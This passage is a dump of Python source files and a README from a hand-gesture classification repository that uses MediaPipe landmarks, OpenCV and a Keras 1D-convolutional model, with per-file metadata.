(int(hand_landmarks.landmark[point.MIDDLE_FINGER_MCP].x * image_height),\n int(hand_landmarks.landmark[point.MIDDLE_FINGER_MCP].y * image_width)))\n\n ring_finger_mcp = np.array((int(hand_landmarks.landmark[point.RING_FINGER_MCP].x * image_height),\n int(hand_landmarks.landmark[point.RING_FINGER_MCP].y * image_width)))\n\n pinky_finger_mcp = np.array((int(hand_landmarks.landmark[point.PINKY_MCP].x * image_height),\n int(hand_landmarks.landmark[point.PINKY_MCP].y * image_width)))\n\n thumb_cmc = np.array((int(hand_landmarks.landmark[point.THUMB_CMC].x * image_height),\n int(hand_landmarks.landmark[point.THUMB_CMC].y * image_width)))\n\n wrist = np.array((int(hand_landmarks.landmark[point.WRIST].x * image_height),\n int(hand_landmarks.landmark[point.WRIST].y * image_width)))\n\n normalizedLandmark = hand_landmarks.landmark[point]\n pixelCoordinatesLandmark = mp_drawing._normalized_to_pixel_coordinates(normalizedLandmark.x,\n 
normalizedLandmark.y,\n image_width, image_height)\n\n mp_drawing.draw_landmarks(\n image, hand_landmarks, mp_hands.HAND_CONNECTIONS)\n\n vertices = np.array([[index_finger_mcp[0], index_finger_mcp[1]],\n [middle_finger_mcp[0], middle_finger_mcp[1]],\n [ring_finger_mcp[0], ring_finger_mcp[1]],\n [pinky_finger_mcp[0], pinky_finger_mcp[1]],\n [wrist[0], wrist[1]],\n [thumb_cmc[0], thumb_cmc[1]]], dtype=np.int32)\n\n pts = vertices.reshape((-1, 1, 2))\n cv2.polylines(image, [pts], isClosed=True, color=(0, 255, 255), thickness=1)\n # fill the palm zone.\n cv2.fillPoly(image, [pts], color=(0, 255, 255))\n cv2.line(image, (index_finger_mcp[0], index_finger_mcp[1]),\n (pinky_finger_mcp[0], pinky_finger_mcp[1]), (255, 0, 0), thickness=3)\n\n cv2.imshow('MediaPipe Hands', image)\n cv2.imshow('Original frame', cv2.flip(frame, 1))\n\n if cv2.waitKey(5) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n cap.release()\n\ncap.release()\n" }, { "alpha_fraction": 0.581260621547699, "alphanum_fraction": 0.5860306620597839, "avg_line_length": 32.72988510131836, "blob_id": "170b800794d81103749051bc4347b7dae91cc06c", "content_id": "8c3d72949b4cbc1c899a2e93ff6efd3ce7e99ca4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5870, "license_type": "no_license", "max_line_length": 119, "num_lines": 174, "path": "/src/train.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport datetime\nimport glob\nimport os\nimport tqdm\nfrom argparse import ArgumentParser\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nfrom tensorflow.keras.models import load_model, save_model\n\nimport models\nfrom live_test import WebcamTest\nfrom checkpoints import model_checkpoint, tensorboard, reduce_lr_on_plateau\nfrom data import Dataloader\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\ndef get_pose_labels():\n\n with open('encoded_labels.json', 'r') as f:\n labels = json.load(f, encoding='unicode_escape')\n\n return labels\n\n\ndef genModelPath():\n now = datetime.datetime.now()\n\n if not os.path.exists(os.getcwd() + '/models'):\n os.makedirs(os.getcwd() + '/models')\n else:\n name = 'model_{}-{}-{}:{}'.format(now.day, now.month, now.hour, now.minute)\n if not os.path.exists('models/' + name):\n os.makedirs('models/' + name)\n\n return 'models/' + name + '/trained_model.h5'\n\n\ndef get_latest_model_dir():\n return max(glob.glob(os.path.join('models/', '*/')), key=os.path.getmtime)\n\n\ndef check_gpu_status():\n physical_devices = tf.config.list_physical_devices('GPU')\n\n if physical_devices:\n for device in physical_devices:\n print(f\" GPU is available: {device}\")\n else:\n print(\"GPU not available\")\n\n\ndef train(args):\n check_gpu_status()\n save_path = genModelPath()\n\n data = Dataloader(args)\n train_ds = data.get_train_data()\n test_ds = data.get_test_data()\n number_of_gestures = 10\n\n model = models.conv_model((63, 1), number_of_gestures)\n\n print(model.summary())\n\n history = model.fit(train_ds,\n epochs=args.epochs,\n batch_size=args.batch_size,\n callbacks=[tensorboard(), reduce_lr_on_plateau(), model_checkpoint(save_path)],\n validation_data=test_ds,\n verbose=1\n )\n\n model_dir = 'models/'\n save_model(model, model_dir, overwrite=True, include_optimizer=False)\n os.environ['MODEL_DIR'] = model_dir\n convert_to_tflite(save_path)\n print('-' * 50 + '\\n')\n print(\"\\nModel training has 
ended\\n\")\n print('-' * 50 + '\\n')\n plot_loss(history)\n\n\ndef plot_loss(history):\n print(\"Plotting graphs\")\n plt.plot(history.history['loss'], color='red')\n plt.plot(history.history['accuracy'])\n plt.xlabel('epoch')\n plt.ylabel('loss and accuracy')\n plt.title('Accuracy vs loss')\n plt.legend(['train', 'valid'], loc='upper right')\n plt.savefig(f'model_diagnostics/model_losses_performance.jpg')\n print(\"done plotting losses at model_diagnostics/model_losses_performance.jpg\")\n\n\ndef get_recent_model():\n print('-' * 50 + '\\n')\n print(f'\\n Fetching the recent model from: {get_latest_model_dir()}')\n model = load_model(os.path.join(get_latest_model_dir(), 'trained_model.h5'))\n return model\n\n\ndef convert_to_tflite(model_dir):\n print('-' * 50 + '\\n')\n converter = tf.lite.TFLiteConverter.from_saved_model(model_dir) \n tflite_model = converter.convert()\n\n with open(model_dir + '/gesture_model.tflite', 'wb') as f:\n f.write(tflite_model)\n\n print(f\"converted to tflite version\")\n\n\ndef test(args):\n\n model = get_recent_model()\n\n if args.test_live == 'True':\n test_on_camera = WebcamTest(model)\n test_on_camera.detectHands()\n elif args.test_csv:\n test_folder(model, args.test_csv)\n\n\ndef test_folder(model, csv):\n \n test_csv = pd.read_csv(csv)\n test_images = test_csv['file_name']\n test_label = list(test_csv['label']) \n predicted_label = []\n labels = get_pose_labels()\n\n for img_file_name in tqdm.tqdm(test_images, desc='Testing on images.'): \n file_path = img_file_name.split(\"../../\")[1]\n img = cv2.imread(file_path)\n\n img = np.expand_dims(img, axis=0)\n prediction = np.argmax(model.predict(img))\n predicted_label.append(labels[prediction])\n\n confusion_mat = confusion_matrix(test_label, predicted_label)\n accuracy = accuracy_score(test_label, predicted_label)\n print(f\"confusion matrix: {confusion_mat} accuracy: {accuracy}\")\n \n\nif __name__ == '__main__':\n\n p = ArgumentParser()\n p.add_argument('--csv', type=str, required=False, default='../data/landmarks.csv', help='Location of the csv file '\n 'containing landmarks '\n 'data')\n p.add_argument('--split_size', type=float, required=False, default=0.05, help='Splitting the data to train and '\n 'test size')\n p.add_argument('--test_csv', required=False, type=str, default='../Test_images/test_data.csv', help='Folder '\n 'containing '\n 'test images')\n p.add_argument('--test_live', required=False, type=str, default='False', help='Testing on live video')\n p.add_argument('--batch_size', required=False, default=64, type=int, help='Batch size for training')\n p.add_argument('--epochs', required=False, type=int, default=10, help='Number of training epochs')\n p.add_argument('--train', required=True, type=str, default='True', help='Train mode')\n p.add_argument('--test', required=True, type=str, default='False', help='Test mode')\n\n print(p.format_usage())\n args = p.parse_args()\n\n if args.train == 'True':\n train(args)\n elif args.test == 'True':\n test(args)\n\n" }, { "alpha_fraction": 0.45075756311416626, "alphanum_fraction": 0.6003788113594055, "avg_line_length": 22, "blob_id": "b56e338450bc28ac9936dc8b5bb440a17f98e968", "content_id": "a8c048422ee120f89ca79c7a8c7677989a61451e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 528, "license_type": "no_license", "max_line_length": 68, "num_lines": 23, "path": "/misc/line_drawing.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2 \nimport 
numpy as np \n\nimage = np.zeros((640,480,3))\npoint_1 = np.array((100,100))\npoint_2 = np.array((300,100))\npoint_3 = np.array((400, 400))\n\nline = [point_1, point_2]\n\nv1 = [line[1][0] - line[0][0], line[1][1] - line[0][1]]\nv2 = [line[1][0] - point_3[0], line[1][1] - point_3[1]]\n\nxp = (v1[0] * v2[1]) - (v1[1] * v2[0])\n\nprint(xp)\n\ncv2.line(image, point_1, point_2, (0,255,0), 2)\ncv2.circle(image, point_3, radius=0, color=(0, 0, 255), thickness=5)\ncv2.imshow('test', image)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.4739725887775421, "alphanum_fraction": 0.49771690368652344, "avg_line_length": 27.842105865478516, "blob_id": "43f3092c5bb7bf3f5e6d133db221f7853c79f026", "content_id": "f8f8a8e47ce8ab69d169fd2ad431be4eb1c6f768", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1095, "license_type": "no_license", "max_line_length": 101, "num_lines": 38, "path": "/misc/hand_bbox.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport mediapipe as mp\n\nmphands = mp.solutions.hands\nhands = mphands.Hands()\nmp_drawing = mp.solutions.drawing_utils\ncap = cv2.VideoCapture(0)\n\n_, frame = cap.read()\n\nh, w, _ = frame.shape\n\nwhile True:\n _, frame = cap.read()\n framergb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n result = hands.process(framergb)\n hand_landmarks = result.multi_hand_landmarks\n if hand_landmarks:\n for handLMs in hand_landmarks:\n x_max = 0\n y_max = 0\n x_min = w \n y_min = h \n for lm in handLMs.landmark:\n x, y = int(lm.x * w), int(lm.y * h)\n if x > x_max:\n x_max = x\n if x < x_min:\n x_min = x\n if y > y_max:\n y_max = y\n if y < y_min:\n y_min = y\n cv2.rectangle(frame, (x_min - 30, y_min - 30), (x_max + 30 , y_max + 30), (0, 255, 0), 2)\n mp_drawing.draw_landmarks(frame, handLMs, mphands.HAND_CONNECTIONS)\n cv2.imshow(\"Frame\", frame)\n\n cv2.waitKey(1)" }, { "alpha_fraction": 0.6656171083450317, "alphanum_fraction": 0.7015113234519958, "avg_line_length": 35.906978607177734, "blob_id": "d97481df399e9ba116ecf5fbccdd413f6553d689", "content_id": "3da5239bcceea5e6386f7b58c54c1f89b65ed242", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1588, "license_type": "no_license", "max_line_length": 91, "num_lines": 43, "path": "/src/models.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "from tensorflow.keras.utils import plot_model\nfrom tensorflow.keras.layers import Dense, Conv1D, MaxPooling1D\nfrom tensorflow.keras.layers import Dropout, Input\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.models import Model\nfrom tensorflow.python.keras.layers.core import Flatten\n\n\ndef test_model():\n model = Sequential([\n Dense(64, activation='relu'),\n Dense(32, activation='relu'),\n Dense(16, activation='relu'),\n Dense(10)\n ])\n\n model.compile(optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n return model\n\n\ndef conv_model(input_size, number_of_gestures):\n\n inputs = Input(input_size)\n conv1d = Conv1D(filters=512, kernel_size=3, activation='linear')(inputs)\n conv2d = Conv1D(filters=256, kernel_size=3, activation='elu')(conv1d)\n conv3d = Conv1D(filters=128, kernel_size=3, activation='relu')(conv2d)\n conv4d = Conv1D(filters=64, kernel_size=2, activation='elu')(conv3d)\n drop1 = Dropout(0.2)(conv4d)\n max_pool = MaxPooling1D(pool_size=2)(drop1) \n flatten = Flatten()(max_pool)\n 
dense1 = Dense(256, activation='relu')(flatten)\n dense2 = Dense(128, activation='elu')(dense1)\n dense3 = Dense(32, activation='relu')(dense2)\n outputs = Dense(number_of_gestures, activation='softmax')(dense3)\n\n model = Model(inputs=inputs, outputs=outputs)\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n plot_model(model, to_file='model_diagnostics/model_architecture.jpg', show_shapes=True)\n\n return model\n\n" }, { "alpha_fraction": 0.5353233814239502, "alphanum_fraction": 0.5462686419487, "avg_line_length": 28.58823585510254, "blob_id": "bab0a1214b05081bfe850df0de9ab2e135e6616d", "content_id": "e06209ed47a467da1f126407cbfac0dc4f6a2468", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1005, "license_type": "no_license", "max_line_length": 97, "num_lines": 34, "path": "/utils/test_resize.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nimport os\nimport glob\nimport tqdm \nfrom argparse import ArgumentParser\n\ndef img_aug(args):\n \n src_path = args.image_dir\n folder = os.listdir(src_path)\n \n for dir in tqdm.tqdm(folder):\n print(f\"Processing: {dir}\")\n imgs = glob.glob(src_path + dir + \"/*.png\") # + usr + \"/train_pose/\"\n dest = \"/resize-\" + dir + \"/\" \n \n if not os.path.exists(src_path + dir + dest):\n os.mkdir(src_path + dir + dest) # usr + \"/train_pose/\" \n \n for img in imgs:\n print(f\"Processing image: {img}\")\n\n image = cv2.imread(img)\n image = cv2.resize(image, (640,480))\n cv2.imwrite(src_path + dir + dest + f\"{dir}_%s\"%str(img).split(\"/\")[-1], image)\n \n\nif __name__ == \"__main__\":\n p = ArgumentParser()\n p.add_argument('--image_dir', type=str, default='./', help='Directory containing the images')\n print(p.format_usage())\n args = p.parse_args()\n img_aug(args)" }, { "alpha_fraction": 0.6900269389152527, "alphanum_fraction": 0.7035040259361267, "avg_line_length": 38.05263137817383, "blob_id": "1ea2ab61b9befc1d397928ea197aeaba0a0869ac", "content_id": "4e4a4076620f8daad5d1cade54e1bd65eb5f9f4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1484, "license_type": "no_license", "max_line_length": 94, "num_lines": 38, "path": "/misc/getpbtxt.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport os \nfrom tensorflow import keras\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.python.framework.convert_to_constants import convert_variables_to_constants_v2\nimport numpy as np\n#path of the directory where you want to save your model\nfrozen_out_path = os.getcwd() #\"../cloud_models/model_24-6-3:48/\"\n# name of the .pb file\nfrozen_graph_filename = \"../cloud_models/model_24-6-3:48/\"\nmodel = load_model(frozen_graph_filename)\n# Convert Keras model to ConcreteFunction\nfull_model = tf.function(lambda x: model(x))\nfull_model = full_model.get_concrete_function(\n tf.TensorSpec(model.inputs[0].shape, model.inputs[0].dtype))\n# Get frozen ConcreteFunction\nfrozen_func = convert_variables_to_constants_v2(full_model)\nfrozen_func.graph.as_graph_def()\nlayers = [op.name for op in frozen_func.graph.get_operations()]\nprint(\"-\" * 60)\nprint(\"Frozen model layers: \")\nfor layer in layers:\n print(layer)\nprint(\"-\" * 60)\nprint(\"Frozen model inputs: \")\nprint(frozen_func.inputs)\nprint(\"Frozen model outputs: 
\")\nprint(frozen_func.outputs)\n# Save frozen graph to disk\ntf.io.write_graph(graph_or_graph_def=frozen_func.graph,\n logdir=frozen_out_path,\n name=f\"frozen_model.pb\",\n as_text=False)\n# Save its text representation\ntf.io.write_graph(graph_or_graph_def=frozen_func.graph,\n logdir=frozen_out_path,\n name=f\"frozen_graph.pbtxt\",\n as_text=True)\n" }, { "alpha_fraction": 0.6697154641151428, "alphanum_fraction": 0.6961382031440735, "avg_line_length": 27.941177368164062, "blob_id": "c65f39144858a16ca5df2215aac6aab2cf213e1c", "content_id": "ac195db4cd9ecee921ff58061c433ae2e0f5b94a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 984, "license_type": "no_license", "max_line_length": 107, "num_lines": 34, "path": "/misc/convert_keras_to_onnx.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import tensorflow as tf \nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras.models import load_model\nimport onnx\nimport keras2onnx, os\nfrom argparse import ArgumentParser\nfrom datetime import datetime\nimport tf2onnx\nimport onnxruntime as rt\n\n\ndef convert_from_keras_to_onnx():\n\n model = load_model('cloud_models/model_24-6-3:48/') #os.path.join(args.keras_model, 'trained_model.h5'\n print(model.summary())\n\n onnx_model = keras2onnx.convert_keras(model, name=\"example\", target_opset=9, channel_first_inputs=None)\n onnx.save_model(onnx_model, 'cloud_converted_model.onnx')\n\ndef convert_from_tf_to_onxx():\n \n spec = (tf.TensorSpec((None, 224, 224, 3), tf.float32, name=\"input\"),)\n output_path = model.name + \".onnx\"\n\n\n\nif __name__ == '__main__':\n\n # p = ArgumentParser()\n # p.add_argument('--keras_model', type=str, required=True, default='models/model_24-6-3:48/')\n\n # args = p.parse_args()\n \n convert_from_keras_to_onnx()\n" }, { "alpha_fraction": 0.6177992224693298, "alphanum_fraction": 0.6222835183143616, "avg_line_length": 37.6533317565918, "blob_id": "896d32b2644bee6f1cb666b024d457e08af0e6b4", "content_id": "bd1b9efa483407dded46c9a6de2e981b5ea8d378", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2899, "license_type": "no_license", "max_line_length": 110, "num_lines": 75, "path": "/src/data.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "# from re import S\nimport numpy as np\nfrom numpy import array\nimport pandas as pd\nimport os, pickle\nimport tensorflow as tf\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\nclass Dataloader:\n\n def __init__(self, args):\n self.csv_data = pd.read_csv(args.csv)\n self.csv_label = self.csv_data.pop('label')\n self.clean_csv()\n\n self.split_size = args.split_size\n self.batch_size = args.batch_size\n self.train_x = self.test_x = self.train_y = self.test_y = None\n self.encode_labels()\n self.split_data_to_train_test()\n\n def clean_csv(self):\n self.csv_data = self.csv_data.drop('file_name', axis=1)\n self.csv_data = self.csv_data.drop('hand', axis=1)\n self.csv_data = shuffle(self.csv_data)\n\n self.csv_data = np.array(self.csv_data)\n self.csv_label = array(self.csv_label)\n print(f\"csv_data shape: {self.csv_data.shape}\")\n\n def encode_labels(self):\n label_mappings = {}\n label_encoder = LabelEncoder()\n integer_encoded = 
label_encoder.fit_transform(self.csv_label)\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n self.csv_label = onehot_encoder.fit_transform(integer_encoded)\n\n for i in range(0, self.csv_label.shape[1]):\n inverted = label_encoder.inverse_transform([i])\n label_mappings[str(i)] = inverted[0]\n print(f\"{i} --> {inverted}\")\n\n with open('encoded_labels.json', 'wb') as fp:\n pickle.dump(label_mappings, fp)\n\n def split_data_to_train_test(self):\n self.train_x, self.test_x, self.train_y, self.test_y = train_test_split(self.csv_data, self.csv_label,\n test_size=self.split_size)\n print(f\"train_x shape: {self.train_x.shape}\")\n print(f\"train_y shape: {self.train_y.shape}\")\n print(f\"test_x shape: {self.test_x.shape}\")\n print(f\"test_y shape: {self.test_y.shape}\")\n\n def get_train_data(self):\n self.train_x = self.train_x.reshape(self.train_x.shape[0], self.train_x.shape[1], 1)\n train_ds = tf.data.Dataset.from_tensor_slices((self.train_x, self.train_y))\n train_ds = train_ds.batch(self.batch_size)\n train_ds = train_ds.prefetch(tf.data.AUTOTUNE)\n\n return train_ds\n\n def get_test_data(self):\n self.test_x = self.test_x.reshape(self.test_x.shape[0], self.test_x.shape[1], 1)\n test_ds = tf.data.Dataset.from_tensor_slices((self.test_x, self.test_y))\n test_ds = test_ds.batch(self.batch_size)\n test_ds = test_ds.prefetch(tf.data.AUTOTUNE)\n\n return test_ds\n" }, { "alpha_fraction": 0.5371127724647522, "alphanum_fraction": 0.5710111260414124, "avg_line_length": 28, "blob_id": "5ce5c0553faaa13f8f44d7c7930c40314f2a5d1f", "content_id": "83e0343e14751f99ba8317ac9d51e876a252cf31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1711, "license_type": "no_license", "max_line_length": 71, "num_lines": 59, "path": "/utils/rotate.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\nimport random\n\ndef rotate_image(image, angle):\n\n image_size = (image.shape[1], image.shape[0])\n image_center = tuple(np.array(image_size) / 2)\n\n rot_mat = np.vstack(\n [cv2.getRotationMatrix2D(image_center, angle, 1.0), [0, 0, 1]])\n\n rot_mat_notranslate = np.matrix(rot_mat[0:2, 0:2])\n\n image_w2 = image_size[0] * 0.5\n image_h2 = image_size[1] * 0.5\n\n rotated_coords = [\n (np.array([-image_w2, image_h2]) * rot_mat_notranslate).A[0],\n (np.array([ image_w2, image_h2]) * rot_mat_notranslate).A[0],\n (np.array([-image_w2, -image_h2]) * rot_mat_notranslate).A[0],\n (np.array([ image_w2, -image_h2]) * rot_mat_notranslate).A[0]\n ]\n\n x_coords = [pt[0] for pt in rotated_coords]\n x_pos = [x for x in x_coords if x > 0]\n x_neg = [x for x in x_coords if x < 0]\n\n y_coords = [pt[1] for pt in rotated_coords]\n y_pos = [y for y in y_coords if y > 0]\n y_neg = [y for y in y_coords if y < 0]\n\n right_bound = max(x_pos)\n left_bound = min(x_neg)\n top_bound = max(y_pos)\n bot_bound = min(y_neg)\n\n new_w = int(abs(right_bound - left_bound))\n new_h = int(abs(top_bound - bot_bound))\n\n trans_mat = np.matrix([\n [1, 0, int(new_w * 0.5 - image_w2)],\n [0, 1, int(new_h * 0.5 - image_h2)],\n [0, 0, 1]])\n\n affine_mat = (np.matrix(trans_mat) * np.matrix(rot_mat))[0:2, :]\n\n result = cv2.warpAffine(\n image,\n affine_mat,\n (new_w, new_h),\n flags=cv2.INTER_LINEAR)\n\n return result\n\ndef random_rotation(image, low_angle, high_angle):\n angle = random.randint(low_angle, high_angle)\n # print(\"angle : \", angle)\n return 
rotate_image(image, angle)\n" }, { "alpha_fraction": 0.39093589782714844, "alphanum_fraction": 0.4034635126590729, "avg_line_length": 38.911766052246094, "blob_id": "acd27db9318e99097862143e7dd50db67a99925d", "content_id": "17ee42a966351c2e9c43607b5b59121a7bd45dfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2714, "license_type": "no_license", "max_line_length": 119, "num_lines": 68, "path": "/misc/bbox_tocsv.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport os, glob\nimport mediapipe as mp\nimport pandas as pd\nfrom argparse import ArgumentParser\n\ndef b_box(args):\n src_path = args.image_dir\n user = os.listdir(src_path)\n mphands = mp.solutions.hands\n # hands = mphands.Hands()\n\n src_path = args.image_dir\n csv_columns = ['file_name', 'x_min', 'x_max', 'y_min','y_max']\n\n user = os.listdir(src_path)\n\n with mphands.Hands(\n static_image_mode=True,\n max_num_hands=1,\n min_detection_confidence=0.5) as hands:\n for usr in user:\n files = ['five','four','three','two','C','heavy','hang','L','ok','palm','palm_u']\n for fol in files:\n imgs = glob.glob(src_path+usr+\"/train_pose/\"+fol+\"/aug/*.png\")\n # print(imgs)\n ls = []\n for img in imgs:\n print(img)\n image = cv2.imread(img)\n h, w, _ = image.shape\n framergb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n result = hands.process(framergb)\n hand_landmarks = result.multi_hand_landmarks\n if hand_landmarks:\n list = []\n for handLMs in hand_landmarks:\n x_max = 0\n y_max = 0\n x_min = w \n y_min = h \n for lm in handLMs.landmark:\n x, y = int(lm.x * w), int(lm.y * h)\n if x > x_max:\n x_max = x\n if x < x_min:\n x_min = x\n if y > y_max:\n y_max = y\n if y < y_min:\n y_min = y\n # cv2.rectangle(frame, (x_min - 30, y_min - 30), (x_max + 30 , y_max + 30), (0, 255, 0), 2)\n \n list = [str(img).split(\"/\")[-1],x_min-30,x_max+30,y_min-30,y_max+30]\n ls.append(list)\n # break\n data = ls.copy()\n data = pd.DataFrame(data,columns=csv_columns)\n print(data.head())\n data.to_csv(src_path+usr+\"/train_pose/\"+fol+\".csv\")\n print(src_path+usr+\"/train_pose/\"+fol+\"/aug/\"+fol+\".csv\")\n \n\nif __name__ == \"__main__\":\n p = ArgumentParser()\n p.add_argument('--image_dir', type=str, default='./', help='Directory containing the images')\n args = p.parse_args()\n b_box(args)\n" }, { "alpha_fraction": 0.7234185934066772, "alphanum_fraction": 0.7341857552528381, "avg_line_length": 40.654205322265625, "blob_id": "1aec8168c56751ca93eee9f07b6c60c092bc800f", "content_id": "e67862a55d35d7825ee63c9922d5b4c73cf06ac6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4458, "license_type": "no_license", "max_line_length": 182, "num_lines": 107, "path": "/README.md", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "# Hand pose classification\n\nIn this project, we'll be doing hand pose classification based on the landmarks provided by [Mediapipe](https://google.github.io/mediapipe/solutions/hands#python-solution-api)\nThe idea is to classify the hand poses on the extracted landmarks (3D) rather than on the image itself.\n\nI'd like to discuss 2 approaches to this problem. \n1. Using the landmarks from mediapipe to train a deep learning model to do the classification based on landmarks instead of the image itself.\n2. Using the landmarks from mediapipe to classify the poses based on the landmarks. 
\n\n\n![](hand_landmarks.png)\n\nVideo demo can be found on [youtube](https://youtu.be/3V5tQBCl8wQ)\n## Dataset creation and input pipeline.\n\nIn this section,\n- Downloading the data. \n- Creating dataset with hand landmarks.\n- Using tf.data.Dataset to create input pipeline to the model.\n\n### Downloading the dataset\n\n1. Download the dataset from [link](https://www.gti.ssr.upm.es/data/MultiModalHandGesture_dataset)\n2. The dataset contains 16 different gestures from 25 unique users.\n3. Please note that the images are captured from a near-infrared camera.\n4. The gesture is a mirror image when viewed from the back of the hand and the nail side.\n5. For simplicity sake, I have selected gestures for C, five, four, hang, heavy, L, ok, palm, three, two \n6. Before running the script to extract the landmarks to a csv file, copy all images from different users.\n- [ ] write a script gather train images into a single folder.\n\n### Creating dataset with hand landmarks.\n\nloop:\n - for image in the gesture_dir:\n - run mediapipe on the image.\n - get the landmarks.\n - save the landmarks, gesture label, file_name to a csv file.\n \nusage:\n \n`python3 create_data.py --gesture_folder --save_dir --save_images --name_csv`\n\n- gesture_folder --> name of directory containing folders of gestures.\n- save_dir --> name of directory to save annotated images if --save_images is True\n- save_images --> flag to save annotated images or not.\n- name_csv --> name of the csv file containing the hand landmarks.\n\n\n![](examples/frame_17653_l.png) ![](examples/frame_17653_l_annotated.png)\n\n### Creating input pipeline\n\n1. The file at src/data.py is pretty self-explanatory for this step. \n\n## Training structure\n\n1. src/train.py contains all the configuration requirements to train the model.\n2. src/models.py contains the model arcitectures. Add your models here.\n3. src/train.py can test the model on live webcam feed or the test set if the flags are set appropriately.\n\nThe code is pretty self-explanatory. If you need any explanations, please feel free to contact me at [email protected]\n\n## Inference\n\nA test file is located in examples/test.csv which contains the ground truth of the pose along with filenames and the landmarks. \nThe train.py has a lot of arguments which can suit your needs. \n\nTo train on the data and test it on webcam feed:\n\n`python3 train.py --train True --test False --test_live True`\n\n\n## Method II\n\n![](IMG-0075.jpg)\n\nWe define a palm zone first, which is the area as shown in the figure.\nIf a finger tip is in the palm zone, we can make appropriate guesses. \nThe advantages of this method is that, we don't need to train a deep learning model and also we can use this model as a baseline to compare it against the deep learning based model. \nAlso, since there is no inference, we can save around 5ms. (In most cases this is negligible).\nThe disadvantages being that we have to manually code the finger tips to classify a gesture.\nIt is hard to code for gestures like five and palm since the difference between the two poses is subtle.\n\nA horizontal line is drawn between index_finger_mcp(5) and pinky_mcp(17) (blue line in the video)\n\nA vertical line is drawn between index_finger_mcp(5) and thumb_cmc(1) (red line in the video)\n\nTo guess the pose, \n1. check which points are in the palm zone, by checking if it is below the horizontal\n2. 
if the thumb is to the right of the vertical or to the left.\n\nList of gestures we I have trained on:\n\n| **Gesture** | **Fingers in palm zone** |\n| ------- | -------------------- |\n| L | middle, ring , pinky |\n| OK | index, thumb tip |\n| PALM | None |\n| TWO | ring, pinky ,thumb |\n| THREE | pinky, thumb |\n| FOUR | thumb |\n| FIVE | None |\n| HANG | middle, ring, index | \n| HEAVY | middle, ring | \n\n\ncheck out the video for this method [here](https://www.youtube.com/watch?v=jc1ATU62gMk).\n\n" }, { "alpha_fraction": 0.5371496081352234, "alphanum_fraction": 0.5591060519218445, "avg_line_length": 45.779815673828125, "blob_id": "19c3742971dec689214ceb11abd1d61136f87b64", "content_id": "cbf42ae0613f5f0fca146a3aad3a717a914b980e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5101, "license_type": "no_license", "max_line_length": 150, "num_lines": 109, "path": "/create_data.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport mediapipe as mp\nimport os\nimport tqdm\nfrom argparse import ArgumentParser\nimport pandas as pd\nimport time\n\n\ndef detect_hands(args):\n mp_drawing = mp.solutions.drawing_utils\n mp_hands = mp.solutions.hands\n landmarks = []\n\n # For static images:\n with mp_hands.Hands(\n static_image_mode=True,\n max_num_hands=2,\n min_detection_confidence=0.5) as hands:\n\n gesture_folder = os.listdir(args.gesture_folder)\n\n if not os.path.exists(os.getcwd() + '/' + args.save_dir): # if save dir is not created, create a directory to save images.\n os.mkdir(args.save_dir)\n\n print(f\"Gestures: {gesture_folder}\\n\")\n\n for dir in gesture_folder:\n\n image_files = [img for img in os.listdir(os.path.join(args.gesture_folder, dir)) if\n img.endswith('.jpeg') or img.endswith('.png') or img.endswith('.jpg')]\n\n for file in tqdm.tqdm(image_files, desc=f'Processing mediapipe on {dir} gesture images'):\n\n file_path = os.path.join(args.gesture_folder, dir, file)\n\n image = cv2.flip(cv2.imread(file_path), 1) # Read an image, flip it around y-axis for correct handedness output\n results = hands.process(cv2.cvtColor(image, 